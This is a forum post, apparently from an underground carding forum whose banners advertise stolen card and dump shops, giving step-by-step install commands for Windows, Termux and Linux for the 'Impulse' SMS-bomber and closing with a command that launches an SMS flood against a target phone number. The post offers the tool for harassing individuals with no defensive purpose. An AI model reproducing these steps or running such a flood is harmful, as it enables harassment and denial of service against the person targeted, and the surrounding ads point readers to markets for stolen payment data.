logo
Welcome

Join us now to get access to all our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, and so, so much more. It's also quick and totally free, so what are you waiting for?

BidenCash Shop
Kfc Club
banner Expire 1 April  2021
Rescator cvv and dump shop
Yale lodge shop
UniCvv
Vclub
banner expire at 13 August 2024

EagleEye

Member
Joined
Apr 16, 2024
Messages
507
Points
18
SMS-Bomber - software designed for mass sending (spam) SMS messages to a specified mobile phone number.

Installation for windows:
Download Python3.8
https://www.python.org/downloads/release/python-38
After that we need to download Impulse from GitHub'a
Now open cmd and go to the folder with the bomber: cd Impulse
Now we write the command: pip install -r requirements.txt
Well, run it with the command: python impulse.py --help

For thermux:
Code:
pkg update
pkg install python3 python3-pip git -y
git clone https://github.com/LimerBoy/Impulse
cd Impulse /
pip3 install -r requirements.txt
python3 impulse.py --help

For linux:
Code:
sudo apt update
sudo apt install python3 python3-pip git -y
git clone https://github.com/LimerBoy/Impulse
cd Impulse /
pip3 install -r requirements.txt
python3 impulse.py --help

Let's now look at an example of starting an SMS flood:
Code:
python3 impulse.py --method SMS --time 2027 --threads 15 --target + phone number
 
Top